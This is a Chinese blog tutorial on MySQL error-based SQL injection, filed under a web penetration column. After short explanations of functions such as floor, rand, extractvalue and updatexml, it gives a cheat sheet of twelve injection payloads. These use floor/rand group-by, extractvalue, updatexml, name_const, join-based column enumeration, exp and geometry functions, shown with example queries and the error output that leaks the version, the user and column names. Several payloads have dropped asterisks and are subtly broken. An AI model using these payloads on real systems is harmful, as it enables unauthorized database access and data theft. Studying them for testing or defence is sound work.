sql注入--报错注入

最新推荐文章于 2024-12-08 12:33:50 发布

原创最新推荐文章于 2024-12-08 12:33:50 发布 · 718 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#mysql

web渗透专栏收录该内容

15 篇文章

订阅专栏

利用数据库的bug进行利用，看报错信息，报错的信息会出现我们想要的信息

讲解报错注入原理非常详细的一篇博客https://blog.youkuaiyun.com/he_and/article/details/80455884

concat()这个函数用来将两个字符串连接为一个字符串
floor函数的作用是返回小于等于该值的最大整数,也可以理解为向下取整，只保留整数部分。
.rand()函数可以用来生成0或1，但是rand(0)和rand()还是有本质区别的，rand(0)相当于给rand()函数传递了一个参数，然后rand()函数会根据0这个参数进行随机数成成。rand()生成的数字是完全随机的，而rand(0)是有规律的生成
extractvalue() :对XML文档进行查询的函数
updatexml()函数与extractvalue()类似，是更新xml文档的函数。

只要是count(),rand,group by三个连用就会造成这种报错
left(rand(),3)== 不一定报错
floor(rand(0)2)== 一定报错
round(x,d) //x指要处理的数，d是指保留几位小数
Concat()//字符串拼接
select count(),(concat(floor(rand(0)*2),(select database())))xx from admin group by xx;

1.通过floor报错，注入语句如下：
and (select 1 from (select count(*),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);
例：select User from user where User=root and (select 1 from (select count(),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
1062 - Duplicate entry ‘5.5.531’ for key ‘group_key’

2.通过Extractvalue报错，注入语句如下：
and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)));
例：select User from user where User=root and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)));
1054 - Unknown column ‘root’ in ‘where clause’

3.通过UpdateXml报错，注入语句如下：
and 1=(updatexml(1,concat(0x3a,(select user())),1));
例：select User from user where User=root and 1=(updatexml(1,concat(0x3a,(select user())),1));
1054 - Unknown column ‘root’ in ‘where clause’

4.通过NAME_CONST报错，注入语句如下：
and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);
例：select User from user where 1=1 and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);
1060 - Duplicate column name ‘5.5.53’

5.通过join报错爆字段，注入语句如下：（在知道数据库跟表名的情况下使用才可以爆字段）
select * from (select * from 表名 a join 表名 b using(已知的字段，已知的字段)）c);
例：select User from user where User=root and root=(select * from (select * from user a join user b )c);
1060 - Duplicate column name 'Host
select User from user where User=root and root=(select * from (select * from user a join user b using(Host))c);
1060 - Duplicate column name ‘User’
select User from user where User=root and root=(select * from (select * from user a join user b using(Host,User))c);
1060 - Duplicate column name ‘Password’

6.通过exp报错，注入语句如下：
and exp(~(select * from (select user())a));

7.通过GeometryCollection()报错，注入语句如下：
and geometrycollection((select * from (select * from (select user())a)b));

8.通过polygon()报错，注入语句如下：
and polygon((select * from(select * from(select user())a)b));

9.通过multipoint()报错，注入语句如下：
and multipoint((select * from(select * from(select user())a)b));

10.通过multilinestring()报错，注入语句如下：
and multilinestring((select * from (select * from (select user())a )b))

11.通过mulitipolygon()报错，注入语句如下：
and multipolygon((select * from (select * from (select user())a)b));

12.通过multilinestring()报错，注入语句如下：
and multilinestring((select * from(select * from (select user())a)b));